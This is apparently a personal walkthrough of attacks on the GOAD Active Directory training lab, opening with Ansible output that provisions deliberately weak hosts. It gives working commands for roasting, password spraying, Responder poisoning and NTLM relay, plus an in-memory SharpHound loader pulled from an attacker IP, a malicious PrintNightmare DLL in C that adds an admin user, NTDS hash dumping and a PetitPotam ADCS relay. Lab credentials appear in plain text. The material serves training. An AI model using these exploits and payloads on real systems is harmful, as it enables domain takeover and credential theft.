changed: [dc01] => (item={'key': 'renly', 'value': {'account': 'renly.baratheon'}})

PLAY RECAP *************************************************************************************************************************************************************************************************
dc01                       : ok=12   changed=3    unreachable=0    failed=0    skipped=4    rescued=0    ignored=0   
dc02                       : ok=6    changed=2    unreachable=0    failed=0    skipped=4    rescued=0    ignored=0   
srv02                      : ok=8    changed=4    unreachable=0    failed=0    skipped=2    rescued=0    ignored=0   

[*] Run playbook : vulnerabilities.yml with inventory file(s) : /home/bolke/GOAD/ad/GOAD-Light/data/inventory, /home/bolke/GOAD/workspace/850bec-goad-light-virtualbox/inventory, 
/home/bolke/GOAD/globalsettings.ini
[*] CWD: /ansible/
[*] Running command : ansible-playbook -i /home/bolke/GOAD/ad/GOAD-Light/data/inventory -i /home/bolke/GOAD/workspace/850bec-goad-light-virtualbox/inventory -i /home/bolke/GOAD/globalsettings.ini 
vulnerabilities.yml
[WARNING]: Could not match supplied host pattern, ignoring: extensions

PLAY [Read data files] *************************************************************************************************************************************************************************************
 [started TASK: Gathering Facts on dc01]
 [started TASK: Gathering Facts on dc02]
 [started TASK: Gathering Facts on srv02]

TASK [Gathering Facts] *************************************************************************************************************************************************************************************
ok: [srv02]
ok: [dc02]
ok: [dc01]
 [started TASK: save the Json data to a Variable as a Fact on dc01]

TASK [save the Json data to a Variable as a Fact] **********************************************************************************************************************************************************
ok: [dc01]
 [started TASK: find domain_adapter on dc01]

TASK [find domain_adapter] *********************************************************************************************************************************************************************************
ok: [dc01] => (item={'dns_domain': None, 'connection_name': 'Ethernet 2', 'default_gateway': None, 'mtu': 1500, 'interface_name': 'Intel(R) PRO/1000 MT Desktop Adapter #2', 'ipv6': {'address': 'fe80::e990:f5d4:39ba:4f6b%7', 'prefix': '64'}, 'macaddress': '08:00:27:F7:EA:5F', 'speed': 1000, 'interface_index': 7, 'ipv4': {'address': '192.168.56.10', 'prefix': '24'}})
 [started TASK: find nat_adapter on dc01]

TASK [find nat_adapter] ************************************************************************************************************************************************************************************
ok: [dc01] => (item={'dns_domain': 'home', 'connection_name': 'Ethernet', 'default_gateway': 'fe80::2%6', 'mtu': 1500, 'interface_name': 'Intel(R) PRO/1000 MT Desktop Adapter', 'ipv6': [{'address': 'fd17:625c:f037:2:a847:4c4e:e612:2c3c', 'prefix': '64'}, {'address': 'fe80::a847:4c4e:e612:2c3c%6', 'prefix': '64'}], 'macaddress': '08:00:27:7A:A2:FC', 'speed': 1000, 'interface_index': 6, 'ipv4': {'address': '10.0.2.15', 'prefix': '24'}})
 [started TASK: find number of interfaces on dc01]

TASK [find number of interfaces] ***************************************************************************************************************************************************************************
ok: [dc01]
 [started TASK: find if two adapters on dc01]

TASK [find if two adapters] ********************************************************************************************************************************************************************************
ok: [dc01]
 [started TASK: confirm nat_adapter on dc01]

PLAY [Setup vulnerabilities with tasks] ********************************************************************************************************************************************************************
 [started TASK: Gathering Facts on dc01]
 [started TASK: Gathering Facts on dc02]
 [started TASK: Gathering Facts on srv02]

TASK [Gathering Facts] *************************************************************************************************************************************************************************************
ok: [srv02]
ok: [dc02]
ok: [dc01]
 [started TASK: include_role : vulns/{{vuln}} on dc01]
 [started TASK: include_role : vulns/{{vuln}} on dc02]
 [started TASK: include_role : vulns/{{vuln}} on srv02]

TASK [include_role : vulns/{{vuln}}] ***********************************************************************************************************************************************************************
 [started TASK: vulns/disable_firewall : Disable Domain firewall on dc01]
 [started TASK: vulns/disable_firewall : Disable Domain firewall on dc02]
 [started TASK: vulns/disable_firewall : Disable Domain firewall on srv02]

TASK [vulns/disable_firewall : Disable Domain firewall] ****************************************************************************************************************************************************
changed: [srv02]
changed: [dc02]
changed: [dc01]
 [started TASK: vulns/directory : Create directory on dc01]
 [started TASK: vulns/directory : Create directory on dc02]
 [started TASK: vulns/directory : Create directory on srv02]

TASK [vulns/directory : Create directory] ******************************************************************************************************************************************************************
changed: [srv02] => (item={'key': 'shares', 'value': 'C:\\shares'})
changed: [dc02] => (item={'key': 'setup', 'value': 'c:\\setup'})
changed: [dc01] => (item={'key': 'setup', 'value': 'c:\\setup'})
changed: [srv02] => (item={'key': 'all', 'value': 'C:\\shares\\all'})
 [started TASK: vulns/files : Copy a single file on dc01]
 [started TASK: vulns/files : Copy a single file on dc02]
 [started TASK: vulns/files : Copy a single file on srv02]

TASK [vulns/files : Copy a single file] ********************************************************************************************************************************************************************
changed: [dc02] => (item={'key': 'rdp', 'value': {'src': 'dc02/bot_rdp.ps1', 'dest': 'c:\\setup\\bot_rdp.ps1'}})
changed: [dc01] => (item={'key': 'template', 'value': {'src': 'dc01/templates/', 'dest': 'C:\\setup\\'}})
changed: [srv02] => (item={'key': 'website', 'value': {'src': 'srv02/wwwroot', 'dest': 'C:\\inetpub\\'}})
changed: [dc02] => (item={'key': 'sysvol_fake_script', 'value': {'src': 'dc02/sysvol_scripts/script.ps1', 'dest': 'C:\\Windows\\SYSVOL\\domain\\scripts\\script.ps1'}})
changed: [srv02] => (item={'key': 'letter_in_shares', 'value': {'src': 'srv02/all/arya.txt', 'dest': 'C:\\shares\\all\\arya.txt'}})
changed: [dc02] => (item={'key': 'sysvol_secret', 'value': {'src': 'dc02/sysvol_scripts/secret.ps1', 'dest': 'C:\\Windows\\SYSVOL\\domain\\scripts\\secret.ps1'}})
 [started TASK: vulns/adcs_templates : Refresh on dc01]

TASK [vulns/adcs_templates : Refresh] **********************************************************************************************************************************************************************
changed: [dc01]
 [started TASK: vulns/adcs_templates : Install ADCSTemplate Module on dc01]

TASK [vulns/adcs_templates : Install ADCSTemplate Module] **************************************************************************************************************************************************
changed: [dc01]
 [started TASK: vulns/adcs_templates : create a directory for templates on dc01]

TASK [vulns/adcs_templates : create a directory for templates] *********************************************************************************************************************************************
ok: [dc01]
 [started TASK: vulns/adcs_templates : Install templates on dc01]

TASK [vulns/adcs_templates : Install templates] ************************************************************************************************************************************************************
changed: [dc01] => (item={'key': 'ESC1', 'value': {'template_name': 'ESC1', 'template_file': 'C:\\setup\\ESC1.json'}})
 [started TASK: vulns/credentials : Store a password in Credential Manager on dc02]

TASK [vulns/credentials : Store a password in Credential Manager] ******************************************************************************************************************************************
changed: [dc02] => (item={'key': 'TERMSRV/castelblack', 'value': {'username': 'north\\robb.stark', 'secret': 'sexywolfy', 'runas': 'north\\robb.stark', 'runas_password': 'sexywolfy'}})
 [started TASK: vulns/autologon : Add windows autologon on dc02]

TASK [vulns/autologon : Add windows autologon] *************************************************************************************************************************************************************
changed: [dc02] => (item={'key': 'robb.stark', 'value': {'username': 'north\\robb.stark', 'password': 'sexywolfy'}})
 [started TASK: vulns/ntlmdowngrade : Enable LmCompatibilityLevel on dc02]

TASK [vulns/ntlmdowngrade : Enable LmCompatibilityLevel] ***************************************************************************************************************************************************
changed: [dc02]
 [started TASK: vulns/enable_llmnr : Enable LLMNR protocol on dc02]

TASK [vulns/enable_llmnr : Enable LLMNR protocol] **********************************************************************************************************************************************************
changed: [dc02]
 [started TASK: vulns/enable_nbt-ns : Enable NBT-NS protocol on dc02]

TASK [vulns/enable_nbt-ns : Enable NBT-NS protocol] ********************************************************************************************************************************************************
changed: [dc02]
 [started TASK: vulns/shares : Create directory if not exist on dc02]
 [started TASK: vulns/shares : Create share on dc02]
 [started TASK: vulns/shares : include_tasks on dc02]
 [started TASK: vulns/shares : include_tasks on dc02]
 [started TASK: vulns/shares : include_tasks on dc02]
 [started TASK: vulns/shares : include_tasks on dc02]
 [started TASK: vulns/openshares : Ensure directory structure for public share exists on srv02]

TASK [vulns/openshares : Ensure directory structure for public share exists] *******************************************************************************************************************************
changed: [srv02]
 [started TASK: vulns/openshares : Ensure public share exists on srv02]

TASK [vulns/openshares : Ensure public share exists] *******************************************************************************************************************************************************
changed: [srv02]
 [started TASK: vulns/openshares : Add or update registry path to allow guest access in SMB on srv02]

TASK [vulns/openshares : Add or update registry path to allow guest access in SMB] *************************************************************************************************************************
changed: [srv02]
 [started TASK: vulns/openshares : activate guest account on srv02]

TASK [vulns/openshares : activate guest account] ***********************************************************************************************************************************************************
changed: [srv02]
 [started TASK: vulns/openshares : Ensure directory structure for all share exists on srv02]

TASK [vulns/openshares : Ensure directory structure for all share exists] **********************************************************************************************************************************
ok: [srv02]
 [started TASK: vulns/openshares : Add all share everyone rights on srv02]

TASK [vulns/openshares : Add all share everyone rights] ****************************************************************************************************************************************************
changed: [srv02]
 [started TASK: vulns/openshares : all shares on srv02]

TASK [vulns/openshares : all shares] ***********************************************************************************************************************************************************************
changed: [srv02]
 [started TASK: vulns/permissions : change folder allow rights on srv02]

TASK [vulns/permissions : change folder allow rights] ******************************************************************************************************************************************************
changed: [srv02] => (item={'key': 'IIS_IUSRS_upload', 'value': {'path': 'C:\\inetpub\\wwwroot\\upload', 'user': 'IIS_IUSRS', 'rights': 'FullControl'}})
 [started TASK: include_role : ps on dc01]
 [started TASK: include_role : ps on dc02]
 [started TASK: include_role : ps on srv02]

TASK [include_role : ps] ***********************************************************************************************************************************************************************************
 [started TASK: ps : Play task {{ps_script}} on dc02]

TASK [ps : Play task ../ad/GOAD-Light/scripts/asrep_roasting.ps1] ******************************************************************************************************************************************
changed: [dc02]
 [started TASK: ps : Play task {{ps_script}} on dc02]

TASK [ps : Play task ../ad/GOAD-Light/scripts/constrained_delegation_use_any.ps1] **************************************************************************************************************************
changed: [dc02]
 [started TASK: ps : Play task {{ps_script}} on dc02]

TASK [ps : Play task ../ad/GOAD-Light/scripts/constrained_delegation_kerb_only.ps1] ************************************************************************************************************************
changed: [dc02]
 [started TASK: ps : Play task {{ps_script}} on dc02]

TASK [ps : Play task ../ad/GOAD-Light/scripts/ntlm_relay.ps1] **********************************************************************************************************************************************
changed: [dc02]
 [started TASK: ps : Play task {{ps_script}} on dc02]

TASK [ps : Play task ../ad/GOAD-Light/scripts/responder.ps1] ***********************************************************************************************************************************************
changed: [dc02]
 [started TASK: ps : Play task {{ps_script}} on dc02]

TASK [ps : Play task ../ad/GOAD-Light/scripts/gpo_abuse.ps1] ***********************************************************************************************************************************************
changed: [dc02]
 [started TASK: ps : Play task {{ps_script}} on dc02]

TASK [ps : Play task ../ad/GOAD-Light/scripts/rdp_scheduler.ps1] *******************************************************************************************************************************************
changed: [dc02]

PLAY RECAP *************************************************************************************************************************************************************************************************
dc01                       : ok=14   changed=6    unreachable=0    failed=0    skipped=2    rescued=0    ignored=0   
dc02                       : ok=17   changed=15   unreachable=0    failed=0    skipped=6    rescued=0    ignored=0   
srv02                      : ok=13   changed=10   unreachable=0    failed=0    skipped=1    rescued=0    ignored=0   

[*] Lab successfully provisioned in 01:49:15
bolke@hacky:~/GOAD$ 
bolke@hacky:~/GOAD$

just a simple writeup

🧪 Lab info

goad_lab_001

🖥️ Hosts

IP	Name	Hostname	Domain
192.168.X.10	dc01	kingslanding	sevenkingdoms.local
192.168.X.11	dc02	winterfell	north.sevenkingdoms.local
192.168.X.12	dc03	meereen	essos.local
192.168.X.22	srv02	castelblack	north.sevenkingdoms.local
192.168.X.23	srv03	braavos	essos.local
192.168.X.31	ws01	casterlyrock	sevenkingdoms.local

📄 Hosts file

To use kerberos we need add DNS in /etc/hosts file, mandatory for Kerberos (FQDN resolution)

You can generate hosts file with netexec

netexec smb 192.168.X.0/24 --generate-hosts-file hosts_file

192.168.200.10  kingslanding sevenkingdoms.local kingslanding.sevenkingdoms.local
192.168.200.11  winterfell north.sevenkingdoms.local winterfell.north.sevenkingdoms.local
192.168.200.12  meereen essos.local meereen.essos.local
192.168.200.22  castelblack castelblack.north.sevenkingdoms.local
192.168.200.23  braavos braavos.essos.local
192.168.200.31  casterlyrock casterlyrock.sevenkingdoms.local

🔑 Credentials

User	Password	Host	Domain	Comments
samwell.tarly	Heartsbane	winterfell	north.sevenkingdoms.local	SMB Enumeration users on winterfell
brandon.stark	iseedeadpeople	winterfell	north.sevenkingdoms.local	ASREP Roasting on north.sevenkingdoms.local
hodor	hodor	winterfell	north.sevenkingdoms.local	Password spraying on winterfell
jon.snow	iknownothing	winterfell	north.sevenkingdoms.local	Kerberoasting on north.sevenkingdoms.local
robb.stark	sexywolfy	winterfell	north.sevenkingdoms.local	Poisoning and cracking hash

🔍 Recon

🔵 SMB recon with netexec

netexec smb 192.168.X.0/24

goad_recon_smb_crackmapexec

By default, Microsoft enables SMB signing on Domain Controllers. In secure environments, SMB signing should be enforced network-wide to prevent NTLM relay attacks.

3 Domains found!!

sevenkingdoms.local
north.sevenkingdoms.local
essos.local

🔵 All ports scan with Nmap

sudo nmap -sSV -p- -Pn --open --reason --max-retries 2 --host-timeout 10m --min-rate 500 --scan-delay 50ms  --script "vulners,http-title,http-server-header" --script-args vulners.showall=true,http.useragent="Mozilla/5.0",http.pipeline=1 -T3 -oA all_ports_goad -vvv -iL alive

GOAD Open Ports

Finding users

Anonymous SMB Users enumeration with netexec and anonymous sessions allowed

netexec smb 192.168.56.0/24 --users

Found credentials of Samwell Tarly in description field.
NORTH\samwell.tarly:Heartsbane

We were able to enumerate users and groups because WINTERFELL allows anonymous connections.

🔷 Anonymous SMB Users enumeration without anonymous sessions

Generate a usernames wordlist from GOT website

The GOT website contains name and firstname of all actors.

how_to_generate_an_username_wordlist_from_website_001

With the following command we obtain a list FirstName + LastName extracted from the HTLM field aria-label, we eliminate the special characters, sorted alphabetically without repeating and taking into account that there may be actors without a last name.

curl -s \
  -A "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36" \
  https://www.hbo.com/game-of-thrones/cast-and-crew \
  | grep 'href="/game-of-thrones/cast-and-crew/' \
  | grep -o 'aria-label="[^"]*"' \
  | cut -d '"' -f 2 \
  | sed -E 's/[^a-zA-Z. ]//g' \
  | awk '{if(NF == 2) {print $1" "$2} else {print $1}}' \
  | sort -u > got_website_usernames.txt

Archmaester Ebrose
Arya Stark
Balon Greyjoy
...
...
Viserys Targaryen
Yara Greyjoy
Ygritte

The following code is a modification of Namemash script to be able to generate users only with the first name, without last name.

import sys
import os.path

def generate_usernames(name):
    """Generates a list of possible usernames from a given name.

    Args:
        name: The name (full name or single name) to generate usernames from.

    Returns:
        A list of generated usernames.
    """

    lowercase_name = name.lower().strip()
    tokens = lowercase_name.split()

    usernames = []
    if len(tokens) == 1:  # Handle single-name user
        # Use the single name and its variations for usernames
        usernames.append(lowercase_name)
    else:
        # Assume traditional first and last name for multiple tokens
        first_name, last_name = tokens[0], ' '.join(tokens[1:])

        # Generate usernames using different combinations of first and last name
        usernames.append(first_name + last_name)
        usernames.append(last_name + first_name)
        usernames.append(first_name + '.' + last_name)
        usernames.append(last_name + '.' + first_name)
        usernames.append(last_name + first_name[0])
        usernames.append(first_name[0] + last_name)
        usernames.append(last_name[0] + first_name)
        usernames.append(first_name[0] + '.' + last_name)
        usernames.append(last_name[0] + '.' + first_name)
        usernames.append(first_name)
        usernames.append(last_name)

    return usernames

if __name__ == '__main__':
    if len(sys.argv) != 2:
        print(f'usage: {sys.argv[0]} names.txt')
        sys.exit(0)

    if not os.path.exists(sys.argv[1]):
        print(f'{sys.argv[1]} not found')
        sys.exit(0)

    with open(sys.argv[1]) as f:
        for line in f:
            name = line.strip()
            usernames = generate_usernames(name)
            for username in usernames:
                print(username)

python namemash.py got_website_usernames.txt > possible_usernames.txt

alliserthorne
thornealliser
alliser.thorne
thorne.alliser
thornea
...
...
y.greyjoy
g.yara
yara
greyjoy
ygritte

Nmap Username Enumeration without anonymous session

kingslanding

sudo nmap -p 88 --script=krb5-enum-users --script-args="krb5-enum-users.realm='sevenkingdoms.local',userdb=possible_usernames.txt" kingslanding

Found 7 users in sevenkingdoms.local domain.

meereen

sudo nmap -p 88 --script=krb5-enum-users --script-args="krb5-enum-users.realm='essos.local',userdb=possible_usernames.txt" meereen

Found 5 users in essos.local domain.

ASREP Roasting

I create a north_users.txt with all usernames previously found.

arya.stark
brandon.stark
hodor
jeor.mormont
jon.snow
rickon.stark
samwell.tarly
sansa.stark
sql_svc

GetNPUsers.py north.sevenkingdoms.local/ -no-pass -usersfile north_users.txt

hashcat -m 18200 brandon_stark.hash /usr/share/wordlists/rockyou.txt

Found NORTH\brandon.stark:iseedeadpeople credentials.

Password Spraying

This technique can block users

View password policy

crackmapexec smb winterfell --pass-pol

The password policy show us that if we fail 5 times in 5 minutes we lock the accounts for 5 minutes.

View Bad Password Count

We need any user credentials

crackmapexec smb -u samwell.tarly -p Heartsbane -d north.sevenkingdoms.local winterfell --users

Spraying username=password

crackmapexec smb winterfell -u north_users.txt -p north_users.txt --no-bruteforce

Found NORTH\hodor:hodor credentials.

Domain Enumeration

Get Domain Usernames

Getting usernames from north.sevenkingdoms.local domain

GetADUsers.py -all north.sevenkingdoms.local/brandon.stark:iseedeadpeople

Getting usernames from sevenkingdoms.local domain

We can request users from sevenkingdoms.local domain because there is a trust present.

ldapsearch -H ldap://kingslanding -D "brandon.stark@north.sevenkingdoms.local" -w iseedeadpeople -b 'DC=sevenkingdoms,DC=local' "(&(objectCategory=person)(objectClass=user))" | grep 'distinguishedName:'

Getting usernames from essos.local domain

We have no credentials to list this domain, at the moment. 😈

BloodHound

DO NOT USE bloodhound.py

RDP Brandon Strak – Winterfell

xfreerdp /compression /clipboard /dynamic-resolution /toggle-fullscreen /cert-ignore /tls-seclevel:0 /timeout:80000 /bpp:8 /drive:/home/jolmedo/tmp /auto-reconnect /u:brandon.stark /p:iseedeadpeople /d:north /v:winterfell

Enumerate domains

# Execute BloodHound in memory
$data = (New-Object System.Net.WebClient).DownloadData('http://192.168.100.223/SharpHound.exe')
$assem = [System.Reflection.Assembly]::Load($data)
[Sharphound.Program]::Main("--collectionmethods All --domain north.sevenkingdoms.local --searchforest true --outputdirectory c:\users\public\ --zipfilename bh_north_sevenkingdoms.zip".Split())

Enumerate too sevenkingdoms.local and essos.local domains.

Custom queries

All domains and computers

MATCH p = (d:Domain)-[r:Contains*1..]->(n:Computer) RETURN p

All domains and users

MATCH p = (d:Domain)-[r:Contains*1..]->(n:User) RETURN p

All domains, computers, groups and users

MATCH q=(d:Domain)-[r:Contains*1..]->(n:Group)<-[s:MemberOf]-(u:User) RETURN q

View ACL users

MATCH p=(u:User)-[r1]->(n) WHERE r1.isacl=true and not tolower(u.name) contains 'vagrant' RETURN p

List All users and setting pwned!

Match (n:User) RETURN n

Kerberoasting

Search users with SPN (Server Principal Name) enabled.

Impacket

GetUserSPNs.py -request -dc-ip winterfell north.sevenkingdoms.local/brandon.stark:iseedeadpeople -outputfile kerberoasting.hashes

Crackmapexec

crackmapexec ldap winterfell -u brandon.stark -p 'iseedeadpeople' -d north.sevenkingdoms.local --kerberoasting kerberoasting.hashes

Cracking kerberoasting.hashes with hashcat

hashcat -m 13100 --force -a 0 kerberoasting.hashes /usr/share/wordlists/rockyou.txt --force

Found NORTH/jon.snow:iknownothing credentials.

Relay and Poisoning

Responder

In the lab, there are two bots to simulate LLMRN, MDNS and NBT-NS requests. One user has a weak password but no admin right. Another user has admin rights but uses a strong password.

sudo python3 Responder.py -I vboxnet0 # Wait 5 minutes

robb.stark::NORTH:1122334455667788:138B29A14C5A082F19F946BB3AFF537E:01010000000000000090C5E56494D801E5D2F5789054B95D0000000002000800480053003600340001001E00570049004E002D004C00420052004E0041004D0031005300540051005A0004003400570049004E002D004C00420052004E0041004D0031005300540051005A002E0048005300360034002E004C004F00430041004C000300140048005300360034002E004C004F00430041004C000500140048005300360034002E004C004F00430041004C00070008000090C5E56494D801060004000200000008003000300000000000000000000000003000002D4B5557B9EF589ECE5944B06785A55D686F279D120AC87BCBF6D0FEAA6663B90A001000000000000000000000000000000000000900160063006900660073002F0042007200610076006F0073000000000000000000
eddard.stark::NORTH:1122334455667788:76E26250ABF96A09E68ADC5A9B1A4C29:01010000000000000090C5E56494D801CA05EDDA86BE30280000000002000800480053003600340001001E00570049004E002D004C00420052004E0041004D0031005300540051005A0004003400570049004E002D004C00420052004E0041004D0031005300540051005A002E0048005300360034002E004C004F00430041004C000300140048005300360034002E004C004F00430041004C000500140048005300360034002E004C004F00430041004C00070008000090C5E56494D801060004000200000008003000300000000000000000000000003000002D4B5557B9EF589ECE5944B06785A55D686F279D120AC87BCBF6D0FEAA6663B90A001000000000000000000000000000000000000900140063006900660073002F004D006500720065006E000000000000000000

The bot try to make a smb connection to bravos instead of braavos. The DNS doesn’t know bravos without two ‘a’ so by default windows will send a broadcast request to find the associated computer. With responder we answer to that broadcast query and say that this server is us, and so we get the connection from the user.

The NetNTLM hashes are not usable to do pass the hash, but you can crack them to retrieve the password.

Cracking with hashcat

hashcat -m 5600 hash /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule

Found credentials of Robb Stark when cracking hash.
NORTH\robb.stark:sexywolfy

With Robb Stark we pwned NORTH domain, is an Administrator of Winterfell (North DC).

NTLM Relay

Unsigned SMB

netexec smb 192.168.56.0/24 --gen-relay-list relay_hosts.txt

Now we have a list of computer with signing:False

Responder + NTLMRelayx – SMB

Before starting Responder to poison the answer to LLMNR, MDNS and NBT-NS request we must stop the responder SMB and HTTP Server as we don’t want to get the hashes directly but we want to relay them to NTLMRelayx.

sed -i 's/HTTP = On/HTTP = Off/g' ~/Responder/Responder.conf && cat ~/Responder/Responder.conf | grep --color=never 'HTTP ='
sed -i 's/SMB = On/SMB = Off/g' ~/Responder/Responder.conf && cat ~/Responder/Responder.conf | grep --color=never 'SMB ='

Start Responder (check if HTTP and SMB is OFF)

sudo python3 Responder.py -I vboxnet0

Start NTLMRelayx

impacket.ntlmrelayx -tf relay_targets.txt -of netntlm -smb2support -socks

-tf : list of targets to relay the authentication
-of : output file, this will keep the captured smb hashes just like we did before with responder, to crack them later
-smb2support : support for smb2
-socks : will start a socks proxy to use relayed authentication

If you get a error of jinja2, try:
pip3 install Flask Jinja2 --upgrade

The poisoned connections are relayed to castelblack (192.168.56.22) and essos (192.168.56.23) and a socks proxy is setup to use the connection.

As eddard.stark is a domain administrator of north.sevenkingdoms.local he got administrator privileges on castelback.

Now we can use this relay to get an access to the computer as an administrator.

MITM6 + NTLMRelayx – LDAP

(Pending)

Domain Enum with credentials

Check MachineAccountQuota (by default any user can create 10)

netexec ldap winterfell.north.sevenkingdoms.local -u jon.snow -p iknownothing -d north.sevenkingdoms.local -M maq

Add new computer

impacket-addcomputer -computer-name 'samaccountname$' -computer-pass '1Qwerty(' -dc-host winterfell.north.sevenkingdoms.local -domain-netbios NORTH 'north.sevenkingdoms.local/jon.snow:iknownothing'

Delete SPN

python ./krbrelayx/addspn.py --clear -t 'samaccountname$' -u 'north.sevenkingdoms.local\jon.snow' -p 'iknownothing' 'winterfell.north.sevenkingdoms.local'

Change name machine

python ./krbrelayx/renameMachine.py -current-name 'samaccountname$' -new-name 'winterfell' -dc-ip 'winterfell.north.sevenkingdoms.local' north.sevenkingdoms.local/jon.snow:iknownothing

(Pending…)

PrintNightmare

netexec smb 192.168.56.0/24 -M spooler

impacket-rpcdump 192.168.56.10 | egrep 'MS-RPRN|MS-PAR'

Prepare malicious dll

nightmare.c

#include <windows.h> 

int RunCMD()
{
    system("net users jolmedo 1Qwerty! /add");
    system("net localgroup administrators jolmedo /add");
    system ("net localgroup \"Remote Desktop Users\" jolmedo /add");
    return 0;
}

BOOL APIENTRY DllMain(HMODULE hModule,
    DWORD ul_reason_for_call,
    LPVOID lpReserved
)
{
    switch (ul_reason_for_call)
    {
    case DLL_PROCESS_ATTACH:
        RunCMD();
        break;
    case DLL_THREAD_ATTACH:
    case DLL_THREAD_DETACH:
    case DLL_PROCESS_DETACH:
        break;
    }
    return TRUE;
}

Compile

x86_64-w64-mingw32-gcc -shared -o nightmare.dll nightmare.c

sudo impacket-smbserver -comment "SHARE" SMB /home/jolmedo/smb -smb2support

Download and execute exploit

git clone https://github.com/cube0x0/CVE-2021-1675

python3 CVE-2021-1675.py essos.local/jorah.mormont:'H0nnor!'@meereen.essos.local '\\192.168.100.223\smb\nightmare.dll'

Testing new user

xfreerdp /compression /clipboard /dynamic-resolution /toggle-fullscreen /cert-ignore /tls-seclevel:0 /timeout:80000 /bpp:8 /drive:/home/jolmedo/tmp /auto-reconnect /u:jolmedo /p:1Qwerty! /v:meeren

python3 CVE-2021-1675.py north.sevenkingdoms.local/jon.snow:'iknownothing'@north.sevenkingdoms.local '\\192.168.100.223\smb\nightmare.dll'

xfreerdp /compression /clipboard /dynamic-resolution /toggle-fullscreen /cert-ignore /tls-seclevel:0 /timeout:80000 /bpp:8 /drive:/home/jolmedo/tmp /auto-reconnect /u:jolmedo /p:1Qwerty! /v:meeren

Exploit Windows Server 2019 – Winterfell

The above exploit works but does not add the user to the admin group because it is caught by Windows Defender.

https://github.com/newsoft/adduser

adduser.c

x86_64-w64-mingw32-gcc -shared -o nightmare.dll adduser.c -lnetapi32

sudo impacket-smbserver -comment "SHARE" SMB /home/jolmedo/smb -smb2support

python3 CVE-2021-1675.py north.sevenkingdoms.local/jon.snow:'iknownothing'@north.sevenkingdoms.local '\\192.168.100.223\smb\nightmare.dll'

Dumping all hashes

netexec smb winterfell.north.sevenkingdoms.local -u jolmedo -p '1Qwerty!' -M ntdsutil

Don’t forget to clean 🧹

Connect RDP

xfreerdp /compression /clipboard /dynamic-resolution /toggle-fullscreen /cert-ignore /tls-seclevel:0 /timeout:80000 /bpp:8 /drive:/home/jolmedo/tmp /auto-reconnect /u:jolmedo /p:1Qwerty! /d:north /v:winterfell

You will find your dlls inside:

C:\Windows\System32\spool\drivers\x64\3
C:\Windows\System32\spool\drivers\x64\3\Old\{id}\

ADCS

ntlmrelayx.py -t http://192.168.56.23/certsrv/certfnsh.asp -smb2support --adcs --template DomainController

https://github.com/topotam/PetitPotam

python petitpotam.py 192.168.100.223 meereen.essos.local

This attack not works on update AD

—-